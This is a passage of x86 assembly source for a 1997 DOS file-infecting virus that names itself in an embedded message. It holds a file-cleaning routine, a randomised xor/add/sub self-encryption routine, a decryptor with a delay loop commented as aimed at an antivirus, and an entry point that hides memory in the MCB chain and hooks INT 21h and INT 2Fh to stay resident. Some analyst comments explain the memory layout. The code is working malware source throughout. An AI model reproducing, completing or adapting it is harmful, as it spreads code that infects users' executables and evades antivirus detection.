mov dx,ax call FileSeek mov cx,size templateheader + 4 ;size @com_buf ; read real fileheader mov dx,offset @com_buf call Blockread call FileStart call GetdateTime cmp file_type,com jne short @exe2 mov cx,4 mov dx,offset @com_buf call Blockwrite jmp short ordinary1 @exe2 : mov cx,cs:[MZsig] dec cx mov templateheader.signature,cx mov dx,offset templateHeader mov cx,size templateheader call BlockWrite ordinary1 : call fileEnd sub ax,vir_true_len - 1 sbb dx,0 mov cx,dx mov dx,ax call FileSeek xor cx,cx call Blockwrite call SetDateTime call commit_file clean_out : ret FileClean endp Criptate proc push bx xor bx,bx mov ds,bx mov bx,word ptr ds:[46ch] ; returns a random number push cs cs pop ds es mov k_code,bl mov k1_code,bl mov si,bx and si,3 cmp si,3 jl short @well xor si,si @well : mov bh,byte ptr [offset cripstyle+si] mov cripmode,bh mov bh,byte ptr [offset uncripstyle+si] mov uncripmode,bh std mov si,offset NONCRYPTED - 1 mov di,offset Data_Buffer + (NONCRYPTED - START_TSR) - 1 @crip : bt si,15 jc short @stop lodsb cripmode db ? k_code db ? ; xor add sub ,k_code stosb jmp short @crip @stop : cld mov si,offset @uncr_code mov di,offset offset Data_Buffer + (NONCRYPTED - START_TSR) mov cx,REAL_CODE - offset @uncr_code rep movsb pop bx ret Criptate endp Cripstyle db 034h ; xor db 04h ; add db 02ch ; sub Uncripstyle db 34h ; xor db 2ch ; sub db 04h ; add Message db '|||-(BOOBS-)||| Virus , Once again deep in Terronia Land ' db '1997 Bari' intr_sub_w dw 4b00h,4b01h,6c00h intr_sub_b db 1ah,4eh,4fh,3dh,3eh,11h,12h MZsig dw 'ZM'+1 ZMsig dw 'MZ'+1 NONCRYPTED equ $ @uncr_code : db 0beh first_addr dw ? ; mov si,first_addr @uncr : db 02eh ; xor cs:[si] db 80h uncripmode db ? k1_code db ? mov cx,4000 ; do-nothing loop @m1: inc si ; to waste time dec si ; to loop @m1 ; fuck AVP dec si db 81h db 0feh cmp_addr dw ? ; cmp si, jne short @uncr @end : jmp AfterCryp @com_buf db 4 dup (?)
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: saved-header buffer, resident data area and
; `main`, the entry point of the assembled first-generation program.
; - templateheader is the last item before REAL_CODE, i.e. the last 28 bytes of what
;   is written to a host file. Everything from Fileheader to END_TSR is working
;   storage that exists only in memory.
; - SearchStack holds up to Maxfiles handles recorded by PushHandle; Data_Buffer is
;   the staging area in which Criptate builds the encrypted copy.
; - main lies after END_TSR, so it is not part of the copied body. It carves a block
;   out of the current MCB (owner 0008h, word 'CS' at MCB offset 8), copies
;   (VIR_LEN/4)+1 dwords from offset 0, swaps the INT 21h and INT 2Fh vectors in the
;   table at 0:84h and 0:0BCh, sets sleep and command_flag to FALSE and exits with
;   AX=4C00h. Unlike the entry stub, it makes no INT 2Fh AX=FE01h residency probe.
; ---------------------------------------------------------------------------------------
templateheader FileheaderRecord <> ; real file header REAL_CODE equ $ Fileheader FileheaderRecord <> ; header file_status db ? ; infection flag file_type db ? sleep db ? ; flag for Windows 3.X command_flag db ? ; infect command.com ? Searchrec Searchrecord <> ; date & time record SearchStack dw Maxfiles dup (?) ; stack for f-handle FindVar Findrecord <> ; findfirst & findnext SFT db 03bh dup (0) ; System File Table Buffer DTAofs dw ? ; DTA for Findfirst,next DTASeg dw ? COMSeg dw ? ; SEG for command.com f_size dw ? ; com size Data_Buffer db VIR_TRUE_LEN + 16 dup (?) ; Virus temp buffer END_TSR equ $ main : mov ax,ds ; DS = PSP dec ax ; AX = MCB mov ds,ax mov byte ptr ds:[0],'M' sub word ptr ds:[3],VIR_PAR inc ax add ax,ds:[3] mov ds,ax mov byte ptr ds:[0],'Z' ; Z in the last MCB mov word ptr ds:[1],0008 mov word ptr ds:[3],VIR_PAR-1 mov word ptr ds:[8],'CS' inc ax ; SEG TSR cld mov es,ax xor si,si xor di,di push cs pop ds mov cx,(VIR_LEN / 4) + 1 rep movsd call clean_x_stack cli xor ax,ax mov ds,ax mov eax,es shl eax,16 mov ax,offset HOOK_21 xchg ds:[84h],eax mov es:TRAPPED_21,eax mov eax,es shl eax,16 mov ax,offset HOOK_2F xchg ds:[0bch],eax mov es:TRAPPED_2F,eax mov es:sleep,FALSE mov es:command_flag,FALSE sti mov ax,4c00h int 21h CSeg ends end main